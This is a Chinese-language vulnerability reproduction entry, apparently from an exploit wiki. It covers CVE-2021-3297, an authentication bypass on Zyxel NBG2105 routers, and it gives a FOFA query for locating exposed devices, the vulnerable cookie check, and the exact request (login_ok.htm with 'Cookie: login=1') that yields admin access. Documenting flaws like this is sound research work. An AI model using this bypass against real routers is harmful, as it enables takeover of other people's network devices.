# Zyxel NBG2105 身份验证绕过 CVE-2021-3297

## 漏洞描述

Zyxel NBG2105 存在身份验证绕过，攻击者通过更改 login参数可用实现后台登陆

## 漏洞影响

> [!NOTE]
>
> Zyxel NBG2105

## FOFA

> [!NOTE]
>
> app="ZyXEL-NBG2105"

## 漏洞复现

登录页面如下

![](http://wikioss.peiqi.tech/vuln/zyxel-5.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

其中前端文件 **/js/util_gw.js** 存在前端对 Cookie login参数的校验

![](http://wikioss.peiqi.tech/vuln/zyxel-6.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

可以看到检测到 Cookie中的 **login=1** 则跳转 home.html

```
function setCookie() //login_ok.htm use
{
	document.cookie="login=1";
	MM_goToURL('parent', 'home.htm');
}
```

请求如下则会以管理员身份跳转到 **home.htm页面**

```
http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;
```

![](http://wikioss.peiqi.tech/vuln/zyxel-7.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)

## 参考文章

https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass